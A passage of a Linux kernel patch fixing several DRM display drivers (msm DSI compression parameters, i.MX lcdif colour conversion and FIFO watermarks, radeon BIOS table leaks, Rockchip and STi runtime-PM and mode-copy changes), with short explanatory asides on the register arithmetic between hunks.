+ 	2, 0, 0, -2, -4, -6, -8, -8, -8, -10, -10, -12, -12, -12, -12
+ };
+ 
+-static int dsi_populate_dsc_params(struct drm_dsc_config *dsc)
+-{
+-	int mux_words_size;
+-	int groups_per_line, groups_total;
+-	int min_rate_buffer_size;
+-	int hrd_delay;
+-	int pre_num_extra_mux_bits, num_extra_mux_bits;
+-	int slice_bits;
+-	int target_bpp_x16;
+-	int data;
+-	int final_value, final_scale;
++static int dsi_populate_dsc_params(struct msm_dsi_host *msm_host, struct drm_dsc_config *dsc)
++{
+ 	int i;
++	u16 bpp = dsc->bits_per_pixel >> 4;
++
++	if (dsc->bits_per_pixel & 0xf) {
++		DRM_DEV_ERROR(&msm_host->pdev->dev, "DSI does not support fractional bits_per_pixel\n");
++		return -EINVAL;
++	}
++
++	if (dsc->bits_per_component != 8) {
++		DRM_DEV_ERROR(&msm_host->pdev->dev, "DSI does not support bits_per_component != 8 yet\n");
++		return -EOPNOTSUPP;
++	}
+ 
+ 	dsc->rc_model_size = 8192;
+ 	dsc->first_line_bpg_offset = 12;
+@@ -1783,16 +1782,21 @@ static int dsi_populate_dsc_params(struct drm_dsc_config *dsc)
+ 	for (i = 0; i < DSC_NUM_BUF_RANGES; i++) {
+ 		dsc->rc_range_params[i].range_min_qp = min_qp[i];
+ 		dsc->rc_range_params[i].range_max_qp = max_qp[i];
+-		dsc->rc_range_params[i].range_bpg_offset = bpg_offset[i];
++		/*
++		 * Range BPG Offset contains two's-complement signed values that fill
++		 * 8 bits, yet the registers and DCS PPS field are only 6 bits wide.
++		 */
++		dsc->rc_range_params[i].range_bpg_offset = bpg_offset[i] & DSC_RANGE_BPG_OFFSET_MASK;
+ 	}
+ 
+-	dsc->initial_offset = 6144; /* Not bpp 12 */
+-	if (dsc->bits_per_pixel != 8)
++	dsc->initial_offset = 6144;		/* Not bpp 12 */
++	if (bpp != 8)
+ 		dsc->initial_offset = 2048;	/* bpp = 12 */
+ 
+-	mux_words_size = 48;		/* bpc == 8/10 */
+-	if (dsc->bits_per_component == 12)
+-		mux_words_size = 64;
++	if (dsc->bits_per_component <= 10)
++		dsc->mux_word_size = DSC_MUX_WORD_SIZE_8_10_BPC;
++	else
++		dsc->mux_word_size = DSC_MUX_WORD_SIZE_12_BPC;
+ 
+ 	dsc->initial_xmit_delay = 512;
+ 	dsc->initial_scale_value = 32;
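
The new masking in the rc_range_params loop above is sign-safe: a small
negative bpg_offset keeps its value when its 8-bit two's-complement pattern
is truncated to the 6-bit register/PPS field (assuming
DSC_RANGE_BPG_OFFSET_MASK is 0x3f):

    signed char off = -12;   /* 0xf4 in 8-bit two's complement */
    u8 field = off & 0x3f;   /* 0x34 = 0b110100 */
    /* read back as 6-bit two's complement: 52 - 64 = -12 */
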
+@@ -1804,63 +1808,8 @@ static int dsi_populate_dsc_params(struct drm_dsc_config *dsc)
+ 	dsc->flatness_max_qp = 12;
+ 	dsc->rc_quant_incr_limit0 = 11;
+ 	dsc->rc_quant_incr_limit1 = 11;
+-	dsc->mux_word_size = DSC_MUX_WORD_SIZE_8_10_BPC;
+-
+-	/* FIXME: need to call drm_dsc_compute_rc_parameters() so that rest of
+-	 * params are calculated
+-	 */
+-	groups_per_line = DIV_ROUND_UP(dsc->slice_width, 3);
+-	dsc->slice_chunk_size = dsc->slice_width * dsc->bits_per_pixel / 8;
+-	if ((dsc->slice_width * dsc->bits_per_pixel) % 8)
+-		dsc->slice_chunk_size++;
+ 
+-	/* rbs-min */
+-	min_rate_buffer_size =  dsc->rc_model_size - dsc->initial_offset +
+-				dsc->initial_xmit_delay * dsc->bits_per_pixel +
+-				groups_per_line * dsc->first_line_bpg_offset;
+-
+-	hrd_delay = DIV_ROUND_UP(min_rate_buffer_size, dsc->bits_per_pixel);
+-
+-	dsc->initial_dec_delay = hrd_delay - dsc->initial_xmit_delay;
+-
+-	dsc->initial_scale_value = 8 * dsc->rc_model_size /
+-				       (dsc->rc_model_size - dsc->initial_offset);
+-
+-	slice_bits = 8 * dsc->slice_chunk_size * dsc->slice_height;
+-
+-	groups_total = groups_per_line * dsc->slice_height;
+-
+-	data = dsc->first_line_bpg_offset * 2048;
+-
+-	dsc->nfl_bpg_offset = DIV_ROUND_UP(data, (dsc->slice_height - 1));
+-
+-	pre_num_extra_mux_bits = 3 * (mux_words_size + (4 * dsc->bits_per_component + 4) - 2);
+-
+-	num_extra_mux_bits = pre_num_extra_mux_bits - (mux_words_size -
+-			     ((slice_bits - pre_num_extra_mux_bits) % mux_words_size));
+-
+-	data = 2048 * (dsc->rc_model_size - dsc->initial_offset + num_extra_mux_bits);
+-	dsc->slice_bpg_offset = DIV_ROUND_UP(data, groups_total);
+-
+-	/* bpp * 16 + 0.5 */
+-	data = dsc->bits_per_pixel * 16;
+-	data *= 2;
+-	data++;
+-	data /= 2;
+-	target_bpp_x16 = data;
+-
+-	data = (dsc->initial_xmit_delay * target_bpp_x16) / 16;
+-	final_value =  dsc->rc_model_size - data + num_extra_mux_bits;
+-	dsc->final_offset = final_value;
+-
+-	final_scale = 8 * dsc->rc_model_size / (dsc->rc_model_size - final_value);
+-
+-	data = (final_scale - 9) * (dsc->nfl_bpg_offset + dsc->slice_bpg_offset);
+-	dsc->scale_increment_interval = (2048 * dsc->final_offset) / data;
+-
+-	dsc->scale_decrement_interval = groups_per_line / (dsc->initial_scale_value - 8);
+-
+-	return 0;
++	return drm_dsc_compute_rc_parameters(dsc);
+ }
+ 
+ static int dsi_host_parse_dt(struct msm_dsi_host *msm_host)
+diff --git a/drivers/gpu/drm/msm/hdmi/hdmi.c b/drivers/gpu/drm/msm/hdmi/hdmi.c
+index f28fb21e38911..8cd5d50639a53 100644
+--- a/drivers/gpu/drm/msm/hdmi/hdmi.c
++++ b/drivers/gpu/drm/msm/hdmi/hdmi.c
+@@ -252,7 +252,7 @@ static struct hdmi *msm_hdmi_init(struct platform_device *pdev)
+ 	if (hdmi->hpd_gpiod)
+ 		gpiod_set_consumer_name(hdmi->hpd_gpiod, "HDMI_HPD");
+ 
+-	pm_runtime_enable(&pdev->dev);
++	devm_pm_runtime_enable(&pdev->dev);
+ 
+ 	hdmi->workq = alloc_ordered_workqueue("msm_hdmi", 0);
+ 
+diff --git a/drivers/gpu/drm/mxsfb/lcdif_kms.c b/drivers/gpu/drm/mxsfb/lcdif_kms.c
+index b1092aab14231..71546a5d0a48c 100644
+--- a/drivers/gpu/drm/mxsfb/lcdif_kms.c
++++ b/drivers/gpu/drm/mxsfb/lcdif_kms.c
+@@ -5,6 +5,7 @@
+  * This code is based on drivers/gpu/drm/mxsfb/mxsfb*
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/clk.h>
+ #include <linux/io.h>
+ #include <linux/iopoll.h>
+@@ -52,16 +53,22 @@ static void lcdif_set_formats(struct lcdif_drm_private *lcdif,
+ 		writel(DISP_PARA_LINE_PATTERN_UYVY_H,
+ 		       lcdif->base + LCDC_V8_DISP_PARA);
+ 
+-		/* CSC: BT.601 Full Range RGB to YCbCr coefficients. */
+-		writel(CSC0_COEF0_A2(0x096) | CSC0_COEF0_A1(0x04c),
++		/*
++		 * CSC: BT.601 Limited Range RGB to YCbCr coefficients.
++		 *
++		 * |Y |   | 0.2568  0.5041  0.0979|   |R|   |16 |
++		 * |Cb| = |-0.1482 -0.2910  0.4392| * |G| + |128|
++		 * |Cr|   | 0.4392  0.4392 -0.3678|   |B|   |128|
++		 */
++		writel(CSC0_COEF0_A2(0x081) | CSC0_COEF0_A1(0x041),
+ 		       lcdif->base + LCDC_V8_CSC0_COEF0);
+-		writel(CSC0_COEF1_B1(0x7d5) | CSC0_COEF1_A3(0x01d),
++		writel(CSC0_COEF1_B1(0x7db) | CSC0_COEF1_A3(0x019),
+ 		       lcdif->base + LCDC_V8_CSC0_COEF1);
+-		writel(CSC0_COEF2_B3(0x080) | CSC0_COEF2_B2(0x7ac),
++		writel(CSC0_COEF2_B3(0x070) | CSC0_COEF2_B2(0x7b6),
+ 		       lcdif->base + LCDC_V8_CSC0_COEF2);
+-		writel(CSC0_COEF3_C2(0x795) | CSC0_COEF3_C1(0x080),
++		writel(CSC0_COEF3_C2(0x7a2) | CSC0_COEF3_C1(0x070),
+ 		       lcdif->base + LCDC_V8_CSC0_COEF3);
+-		writel(CSC0_COEF4_D1(0x000) | CSC0_COEF4_C3(0x7ec),
++		writel(CSC0_COEF4_D1(0x010) | CSC0_COEF4_C3(0x7ee),
+ 		       lcdif->base + LCDC_V8_CSC0_COEF4);
+ 		writel(CSC0_COEF5_D3(0x080) | CSC0_COEF5_D2(0x080),
+ 		       lcdif->base + LCDC_V8_CSC0_COEF5);
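
The replacement coefficients are consistent with an s2.8 fixed-point encoding
in an 11-bit field, negatives in two's complement (inferred from the register
values themselves, not from documentation):

    /*  0.5041 * 256 ~=  129         ->  0x081              (A2, G->Y) */
    /* -0.1482 * 256 ~=  -37 (trunc) -> (-37) & 0x7ff = 0x7db  (B1)    */
    /* offsets are integers: D1 = 16 = 0x010, D2 = D3 = 128 = 0x080    */
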
+@@ -142,14 +149,36 @@ static void lcdif_set_mode(struct lcdif_drm_private *lcdif, u32 bus_flags)
+ 	       CTRLDESCL0_1_WIDTH(m->hdisplay),
+ 	       lcdif->base + LCDC_V8_CTRLDESCL0_1);
+ 
+-	writel(CTRLDESCL0_3_PITCH(lcdif->crtc.primary->state->fb->pitches[0]),
+-	       lcdif->base + LCDC_V8_CTRLDESCL0_3);
++	/*
++	 * P_SIZE and T_SIZE are undocumented registers, but according to
++	 * what is written in the downstream kernel they control the AXI
++	 * burst size. As of now there are two known values:
++	 *  1 - 128 Byte
++	 *  2 - 256 Byte
++	 * The downstream kernel uses the 256 Byte burst size to improve
++	 * memory efficiency, so set it here too.
++	 */
++	ctrl = CTRLDESCL0_3_P_SIZE(2) | CTRLDESCL0_3_T_SIZE(2) |
++	       CTRLDESCL0_3_PITCH(lcdif->crtc.primary->state->fb->pitches[0]);
++	writel(ctrl, lcdif->base + LCDC_V8_CTRLDESCL0_3);
+ }
+ 
+ static void lcdif_enable_controller(struct lcdif_drm_private *lcdif)
+ {
+ 	u32 reg;
+ 
++	/* Set FIFO Panic watermarks: low 1/3, high 2/3. */
++	writel(FIELD_PREP(PANIC0_THRES_LOW_MASK, 1 * PANIC0_THRES_MAX / 3) |
++	       FIELD_PREP(PANIC0_THRES_HIGH_MASK, 2 * PANIC0_THRES_MAX / 3),
++	       lcdif->base + LCDC_V8_PANIC0_THRES);
++
++	/*
++	 * Enable FIFO Panic; this does not generate an interrupt, but
++	 * boosts NoC priority based on FIFO Panic watermarks.
++	 */
++	writel(INT_ENABLE_D1_PLANE_PANIC_EN,
++	       lcdif->base + LCDC_V8_INT_ENABLE_D1);
++
+ 	reg = readl(lcdif->base + LCDC_V8_DISP_PARA);
+ 	reg |= DISP_PARA_DISP_ON;
+ 	writel(reg, lcdif->base + LCDC_V8_DISP_PARA);
+@@ -177,6 +206,9 @@ static void lcdif_disable_controller(struct lcdif_drm_private *lcdif)
+ 	reg = readl(lcdif->base + LCDC_V8_DISP_PARA);
+ 	reg &= ~DISP_PARA_DISP_ON;
+ 	writel(reg, lcdif->base + LCDC_V8_DISP_PARA);
++
++	/* Disable FIFO Panic NoC priority booster. */
++	writel(0, lcdif->base + LCDC_V8_INT_ENABLE_D1);
+ }
+ 
+ static void lcdif_reset_block(struct lcdif_drm_private *lcdif)
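
With PANIC0_THRES_MAX = 511 (added to lcdif_regs.h below), the watermarks
programmed above evaluate to:

    u32 low  = 1 * 511 / 3;   /* = 170, FIELD_PREP into PANIC0_THRES_LOW_MASK  */
    u32 high = 2 * 511 / 3;   /* = 340, FIELD_PREP into PANIC0_THRES_HIGH_MASK */
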
+diff --git a/drivers/gpu/drm/mxsfb/lcdif_regs.h b/drivers/gpu/drm/mxsfb/lcdif_regs.h
+index c70220651e3a5..37f0d9a06b104 100644
+--- a/drivers/gpu/drm/mxsfb/lcdif_regs.h
++++ b/drivers/gpu/drm/mxsfb/lcdif_regs.h
+@@ -190,6 +190,10 @@
+ #define CTRLDESCL0_1_WIDTH(n)		((n) & 0xffff)
+ #define CTRLDESCL0_1_WIDTH_MASK		GENMASK(15, 0)
+ 
++#define CTRLDESCL0_3_P_SIZE(n)		(((n) << 20) & CTRLDESCL0_3_P_SIZE_MASK)
++#define CTRLDESCL0_3_P_SIZE_MASK	GENMASK(22, 20)
++#define CTRLDESCL0_3_T_SIZE(n)		(((n) << 16) & CTRLDESCL0_3_T_SIZE_MASK)
++#define CTRLDESCL0_3_T_SIZE_MASK	GENMASK(17, 16)
+ #define CTRLDESCL0_3_PITCH(n)		((n) & 0xffff)
+ #define CTRLDESCL0_3_PITCH_MASK		GENMASK(15, 0)
+ 
+@@ -248,6 +252,7 @@
+ 
+ #define PANIC0_THRES_LOW_MASK		GENMASK(24, 16)
+ #define PANIC0_THRES_HIGH_MASK		GENMASK(8, 0)
++#define PANIC0_THRES_MAX		511
+ 
+ #define LCDIF_MIN_XRES			120
+ #define LCDIF_MIN_YRES			120
+diff --git a/drivers/gpu/drm/panel/panel-sitronix-st7701.c b/drivers/gpu/drm/panel/panel-sitronix-st7701.c
+index c481daa4bbceb..225b9884f61a9 100644
+--- a/drivers/gpu/drm/panel/panel-sitronix-st7701.c
++++ b/drivers/gpu/drm/panel/panel-sitronix-st7701.c
+@@ -244,7 +244,7 @@ static void st7701_init_sequence(struct st7701 *st7701)
+ 		   DSI_CMD2_BK0_INVSEL_ONES_MASK |
+ 		   FIELD_PREP(DSI_CMD2_BK0_INVSEL_NLINV_MASK, desc->nlinv),
+ 		   FIELD_PREP(DSI_CMD2_BK0_INVSEL_RTNI_MASK,
+-			      DIV_ROUND_UP(mode->htotal, 16)));
++			      (clamp((u32)mode->htotal, 512U, 1008U) - 512) / 16));
+ 
+ 	/* Command2, BK1 */
+ 	ST7701_DSI(st7701, DSI_CMD2BKX_SEL,
+@@ -762,7 +762,15 @@ static int st7701_dsi_probe(struct mipi_dsi_device *dsi)
+ 	st7701->dsi = dsi;
+ 	st7701->desc = desc;
+ 
+-	return mipi_dsi_attach(dsi);
++	ret = mipi_dsi_attach(dsi);
++	if (ret)
++		goto err_attach;
++
++	return 0;
++
++err_attach:
++	drm_panel_remove(&st7701->panel);
++	return ret;
+ }
+ 
+ static void st7701_dsi_remove(struct mipi_dsi_device *dsi)
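
The RTNI change above replaces a plain DIV_ROUND_UP() with an encoding that clamps htotal to the controller's 512-1008 range and counts 16-pixel steps above 512. A standalone sketch of that arithmetic (illustrative only):

#include <stdio.h>

/* Mirror of the clamp-and-scale expression used for the RTNI field:
 * the result spans 0 (htotal <= 512) to 31 (htotal >= 1008).
 */
static unsigned int st7701_rtni(unsigned int htotal)
{
	if (htotal < 512)
		htotal = 512;
	if (htotal > 1008)
		htotal = 1008;

	return (htotal - 512) / 16;
}

int main(void)
{
	printf("htotal=480  -> RTNI=%u\n", st7701_rtni(480));	/* 0 */
	printf("htotal=640  -> RTNI=%u\n", st7701_rtni(640));	/* 8 */
	printf("htotal=1200 -> RTNI=%u\n", st7701_rtni(1200));	/* 31 */
	return 0;
}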
+diff --git a/drivers/gpu/drm/radeon/radeon_bios.c b/drivers/gpu/drm/radeon/radeon_bios.c
+index 33121655d50bb..63bdc9f6fc243 100644
+--- a/drivers/gpu/drm/radeon/radeon_bios.c
++++ b/drivers/gpu/drm/radeon/radeon_bios.c
+@@ -227,6 +227,7 @@ static bool radeon_atrm_get_bios(struct radeon_device *rdev)
+ 
+ 	if (!found)
+ 		return false;
++	pci_dev_put(pdev);
+ 
+ 	rdev->bios = kmalloc(size, GFP_KERNEL);
+ 	if (!rdev->bios) {
+@@ -612,13 +613,14 @@ static bool radeon_acpi_vfct_bios(struct radeon_device *rdev)
+ 	acpi_size tbl_size;
+ 	UEFI_ACPI_VFCT *vfct;
+ 	unsigned offset;
++	bool r = false;
+ 
+ 	if (!ACPI_SUCCESS(acpi_get_table("VFCT", 1, &hdr)))
+ 		return false;
+ 	tbl_size = hdr->length;
+ 	if (tbl_size < sizeof(UEFI_ACPI_VFCT)) {
+ 		DRM_ERROR("ACPI VFCT table present but broken (too short #1)\n");
+-		return false;
++		goto out;
+ 	}
+ 
+ 	vfct = (UEFI_ACPI_VFCT *)hdr;
+@@ -631,13 +633,13 @@ static bool radeon_acpi_vfct_bios(struct radeon_device *rdev)
+ 		offset += sizeof(VFCT_IMAGE_HEADER);
+ 		if (offset > tbl_size) {
+ 			DRM_ERROR("ACPI VFCT image header truncated\n");
+-			return false;
++			goto out;
+ 		}
+ 
+ 		offset += vhdr->ImageLength;
+ 		if (offset > tbl_size) {
+ 			DRM_ERROR("ACPI VFCT image truncated\n");
+-			return false;
++			goto out;
+ 		}
+ 
+ 		if (vhdr->ImageLength &&
+@@ -649,15 +651,18 @@ static bool radeon_acpi_vfct_bios(struct radeon_device *rdev)
+ 			rdev->bios = kmemdup(&vbios->VbiosContent,
+ 					     vhdr->ImageLength,
+ 					     GFP_KERNEL);
++			if (rdev->bios)
++				r = true;
+ 
+-			if (!rdev->bios)
+-				return false;
+-			return true;
++			goto out;
+ 		}
+ 	}
+ 
+ 	DRM_ERROR("ACPI VFCT table present but broken (too short #2)\n");
+-	return false;
++
++out:
++	acpi_put_table(hdr);
++	return r;
+ }
+ #else
+ static inline bool radeon_acpi_vfct_bios(struct radeon_device *rdev)
+diff --git a/drivers/gpu/drm/rcar-du/Kconfig b/drivers/gpu/drm/rcar-du/Kconfig
+index fd2c2eaee26ba..a5518e90d6896 100644
+--- a/drivers/gpu/drm/rcar-du/Kconfig
++++ b/drivers/gpu/drm/rcar-du/Kconfig
+@@ -41,8 +41,6 @@ config DRM_RCAR_LVDS
+ 	depends on DRM_RCAR_USE_LVDS
+ 	select DRM_KMS_HELPER
+ 	select DRM_PANEL
+-	select OF_FLATTREE
+-	select OF_OVERLAY
+ 
+ config DRM_RCAR_USE_MIPI_DSI
+ 	bool "R-Car DU MIPI DSI Encoder Support"
+diff --git a/drivers/gpu/drm/rockchip/cdn-dp-core.c b/drivers/gpu/drm/rockchip/cdn-dp-core.c
+index 518ee13b1d6f4..8526dda919317 100644
+--- a/drivers/gpu/drm/rockchip/cdn-dp-core.c
++++ b/drivers/gpu/drm/rockchip/cdn-dp-core.c
+@@ -571,7 +571,7 @@ static void cdn_dp_encoder_mode_set(struct drm_encoder *encoder,
+ 	video->v_sync_polarity = !!(mode->flags & DRM_MODE_FLAG_NVSYNC);
+ 	video->h_sync_polarity = !!(mode->flags & DRM_MODE_FLAG_NHSYNC);
+ 
+-	memcpy(&dp->mode, adjusted, sizeof(*mode));
++	drm_mode_copy(&dp->mode, adjusted);
+ }
+ 
+ static bool cdn_dp_check_link_status(struct cdn_dp_device *dp)
+diff --git a/drivers/gpu/drm/rockchip/dw-mipi-dsi-rockchip.c b/drivers/gpu/drm/rockchip/dw-mipi-dsi-rockchip.c
+index f4df9820b295d..912eb4e94c595 100644
+--- a/drivers/gpu/drm/rockchip/dw-mipi-dsi-rockchip.c
++++ b/drivers/gpu/drm/rockchip/dw-mipi-dsi-rockchip.c
+@@ -1221,7 +1221,7 @@ static int dw_mipi_dsi_dphy_power_on(struct phy *phy)
+ 		return i;
+ 	}
+ 
+-	ret = pm_runtime_get_sync(dsi->dev);
++	ret = pm_runtime_resume_and_get(dsi->dev);
+ 	if (ret < 0) {
+ 		DRM_DEV_ERROR(dsi->dev, "failed to enable device: %d\n", ret);
+ 		return ret;
+diff --git a/drivers/gpu/drm/rockchip/inno_hdmi.c b/drivers/gpu/drm/rockchip/inno_hdmi.c
+index 87b2243ea23e3..f51774866f412 100644
+--- a/drivers/gpu/drm/rockchip/inno_hdmi.c
++++ b/drivers/gpu/drm/rockchip/inno_hdmi.c
+@@ -499,7 +499,7 @@ static void inno_hdmi_encoder_mode_set(struct drm_encoder *encoder,
+ 	inno_hdmi_setup(hdmi, adj_mode);
+ 
+ 	/* Store the display mode for plugin/DPMS poweron events */
+-	memcpy(&hdmi->previous_mode, adj_mode, sizeof(hdmi->previous_mode));
++	drm_mode_copy(&hdmi->previous_mode, adj_mode);
+ }
+ 
+ static void inno_hdmi_encoder_enable(struct drm_encoder *encoder)
+diff --git a/drivers/gpu/drm/rockchip/rk3066_hdmi.c b/drivers/gpu/drm/rockchip/rk3066_hdmi.c
+index cf2cf51091a3e..90145ad969841 100644
+--- a/drivers/gpu/drm/rockchip/rk3066_hdmi.c
++++ b/drivers/gpu/drm/rockchip/rk3066_hdmi.c
+@@ -395,7 +395,7 @@ rk3066_hdmi_encoder_mode_set(struct drm_encoder *encoder,
+ 	struct rk3066_hdmi *hdmi = encoder_to_rk3066_hdmi(encoder);
+ 
+ 	/* Store the display mode for plugin/DPMS poweron events. */
+-	memcpy(&hdmi->previous_mode, adj_mode, sizeof(hdmi->previous_mode));
++	drm_mode_copy(&hdmi->previous_mode, adj_mode);
+ }
+ 
+ static void rk3066_hdmi_encoder_enable(struct drm_encoder *encoder)
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+index c356de5dd2206..fa1f4ee6d1950 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+@@ -602,7 +602,7 @@ static int vop_enable(struct drm_crtc *crtc, struct drm_crtc_state *old_state)
+ 	struct vop *vop = to_vop(crtc);
+ 	int ret, i;
+ 
+-	ret = pm_runtime_get_sync(vop->dev);
++	ret = pm_runtime_resume_and_get(vop->dev);
+ 	if (ret < 0) {
+ 		DRM_DEV_ERROR(vop->dev, "failed to get pm runtime: %d\n", ret);
+ 		return ret;
+@@ -1983,7 +1983,7 @@ static int vop_initial(struct vop *vop)
+ 		return PTR_ERR(vop->dclk);
+ 	}
+ 
+-	ret = pm_runtime_get_sync(vop->dev);
++	ret = pm_runtime_resume_and_get(vop->dev);
+ 	if (ret < 0) {
+ 		DRM_DEV_ERROR(vop->dev, "failed to get pm runtime: %d\n", ret);
+ 		return ret;
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+index 105a548d0abeb..8cecf81a5ae03 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+@@ -822,7 +822,7 @@ static void vop2_enable(struct vop2 *vop2)
+ {
+ 	int ret;
+ 
+-	ret = pm_runtime_get_sync(vop2->dev);
++	ret = pm_runtime_resume_and_get(vop2->dev);
+ 	if (ret < 0) {
+ 		drm_err(vop2->drm, "failed to get pm runtime: %d\n", ret);
+ 		return;
+diff --git a/drivers/gpu/drm/rockchip/rockchip_lvds.c b/drivers/gpu/drm/rockchip/rockchip_lvds.c
+index 5a284332ec49e..68f6ebb33460b 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_lvds.c
++++ b/drivers/gpu/drm/rockchip/rockchip_lvds.c
+@@ -152,7 +152,7 @@ static int rk3288_lvds_poweron(struct rockchip_lvds *lvds)
+ 		DRM_DEV_ERROR(lvds->dev, "failed to enable lvds pclk %d\n", ret);
+ 		return ret;
+ 	}
+-	ret = pm_runtime_get_sync(lvds->dev);
++	ret = pm_runtime_resume_and_get(lvds->dev);
+ 	if (ret < 0) {
+ 		DRM_DEV_ERROR(lvds->dev, "failed to get pm runtime: %d\n", ret);
+ 		clk_disable(lvds->pclk);
+@@ -336,16 +336,20 @@ static int px30_lvds_poweron(struct rockchip_lvds *lvds)
+ {
+ 	int ret;
+ 
+-	ret = pm_runtime_get_sync(lvds->dev);
++	ret = pm_runtime_resume_and_get(lvds->dev);
+ 	if (ret < 0) {
+ 		DRM_DEV_ERROR(lvds->dev, "failed to get pm runtime: %d\n", ret);
+ 		return ret;
+ 	}
+ 
+ 	/* Enable LVDS mode */
+-	return regmap_update_bits(lvds->grf, PX30_LVDS_GRF_PD_VO_CON1,
++	ret = regmap_update_bits(lvds->grf, PX30_LVDS_GRF_PD_VO_CON1,
+ 				  PX30_LVDS_MODE_EN(1) | PX30_LVDS_P2S_EN(1),
+ 				  PX30_LVDS_MODE_EN(1) | PX30_LVDS_P2S_EN(1));
++	if (ret)
++		pm_runtime_put(lvds->dev);
++
++	return ret;
+ }
+ 
+ static void px30_lvds_poweroff(struct rockchip_lvds *lvds)
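
The pm_runtime conversions in this and the surrounding hunks all follow the same reasoning: pm_runtime_get_sync() raises the device usage count even when the resume fails, so every error path needs an explicit put, while pm_runtime_resume_and_get() drops the reference itself on failure. A kernel-style sketch of the resulting pattern (example_configure_hw() is a hypothetical helper, not from the patch):

#include <linux/pm_runtime.h>

static int example_poweron(struct device *dev)
{
	int ret;

	ret = pm_runtime_resume_and_get(dev);
	if (ret < 0)
		return ret;	/* reference already dropped for us */

	ret = example_configure_hw(dev);	/* hypothetical helper */
	if (ret)
		pm_runtime_put(dev);	/* later failures still need a put */

	return ret;
}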
+diff --git a/drivers/gpu/drm/sti/sti_dvo.c b/drivers/gpu/drm/sti/sti_dvo.c
+index b6ee8a82e656c..577c477b5f467 100644
+--- a/drivers/gpu/drm/sti/sti_dvo.c
++++ b/drivers/gpu/drm/sti/sti_dvo.c
+@@ -288,7 +288,7 @@ static void sti_dvo_set_mode(struct drm_bridge *bridge,
+ 
+ 	DRM_DEBUG_DRIVER("\n");
+ 
+-	memcpy(&dvo->mode, mode, sizeof(struct drm_display_mode));
++	drm_mode_copy(&dvo->mode, mode);
+ 
+ 	/* According to the path used (main or aux), the dvo clocks should
+ 	 * have a different parent clock. */
+@@ -346,8 +346,9 @@ static int sti_dvo_connector_get_modes(struct drm_connector *connector)
+ 
+ #define CLK_TOLERANCE_HZ 50
+ 
+-static int sti_dvo_connector_mode_valid(struct drm_connector *connector,
+-					struct drm_display_mode *mode)
++static enum drm_mode_status
++sti_dvo_connector_mode_valid(struct drm_connector *connector,
++			     struct drm_display_mode *mode)
+ {
+ 	int target = mode->clock * 1000;
+ 	int target_min = target - CLK_TOLERANCE_HZ;
+diff --git a/drivers/gpu/drm/sti/sti_hda.c b/drivers/gpu/drm/sti/sti_hda.c
+index 03cc401ed5934..15097ac679314 100644
+--- a/drivers/gpu/drm/sti/sti_hda.c
++++ b/drivers/gpu/drm/sti/sti_hda.c
+@@ -524,7 +524,7 @@ static void sti_hda_set_mode(struct drm_bridge *bridge,
+ 
+ 	DRM_DEBUG_DRIVER("\n");
+ 
+-	memcpy(&hda->mode, mode, sizeof(struct drm_display_mode));
++	drm_mode_copy(&hda->mode, mode);
+ 
+ 	if (!hda_get_mode_idx(hda->mode, &mode_idx)) {
+ 		DRM_ERROR("Undefined mode\n");
+@@ -601,8 +601,9 @@ static int sti_hda_connector_get_modes(struct drm_connector *connector)
+ 
+ #define CLK_TOLERANCE_HZ 50
+ 
+-static int sti_hda_connector_mode_valid(struct drm_connector *connector,
+-					struct drm_display_mode *mode)
++static enum drm_mode_status
++sti_hda_connector_mode_valid(struct drm_connector *connector,
++			     struct drm_display_mode *mode)
+ {
+ 	int target = mode->clock * 1000;
+ 	int target_min = target - CLK_TOLERANCE_HZ;
+diff --git a/drivers/gpu/drm/sti/sti_hdmi.c b/drivers/gpu/drm/sti/sti_hdmi.c
+index cb82622877d20..8539fe1fedc4c 100644
+--- a/drivers/gpu/drm/sti/sti_hdmi.c
++++ b/drivers/gpu/drm/sti/sti_hdmi.c
+@@ -941,7 +941,7 @@ static void sti_hdmi_set_mode(struct drm_bridge *bridge,
+ 	DRM_DEBUG_DRIVER("\n");
+ 
+ 	/* Copy the drm display mode in the connector local structure */
+-	memcpy(&hdmi->mode, mode, sizeof(struct drm_display_mode));
++	drm_mode_copy(&hdmi->mode, mode);
+ 
+ 	/* Update clock framerate according to the selected mode */
+ 	ret = clk_set_rate(hdmi->clk_pix, mode->clock * 1000);
+@@ -1004,8 +1004,9 @@ fail:
+ 
+ #define CLK_TOLERANCE_HZ 50
+ 
+-static int sti_hdmi_connector_mode_valid(struct drm_connector *connector,
+-					struct drm_display_mode *mode)
++static enum drm_mode_status
++sti_hdmi_connector_mode_valid(struct drm_connector *connector,
++			      struct drm_display_mode *mode)
+ {
+ 	int target = mode->clock * 1000;
+ 	int target_min = target - CLK_TOLERANCE_HZ;
+diff --git a/drivers/gpu/drm/tegra/dc.c b/drivers/gpu/drm/tegra/dc.c
+index bd0f60704467f..a67453cee8832 100644
+--- a/drivers/gpu/drm/tegra/dc.c
++++ b/drivers/gpu/drm/tegra/dc.c
+@@ -3205,8 +3205,10 @@ static int tegra_dc_probe(struct platform_device *pdev)
+ 	usleep_range(2000, 4000);
+ 
+ 	err = reset_control_assert(dc->rst);
+-	if (err < 0)
++	if (err < 0) {
++		clk_disable_unprepare(dc->clk);
+ 		return err;
++	}
+ 
+ 	usleep_range(2000, 4000);
+ 
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_client.c b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+index 8275bba636119..ab125f79408f2 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_client.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+@@ -237,6 +237,10 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 		in_data->sensor_virt_addr[i] = dma_alloc_coherent(dev, sizeof(int) * 8,
+ 								  &cl_data->sensor_dma_addr[i],
+ 								  GFP_KERNEL);
++		if (!in_data->sensor_virt_addr[i]) {
++			rc = -ENOMEM;
++			goto cleanup;
++		}
+ 		cl_data->sensor_sts[i] = SENSOR_DISABLED;
+ 		cl_data->sensor_requested_cnt[i] = 0;
+ 		cl_data->cur_hid_dev = i;
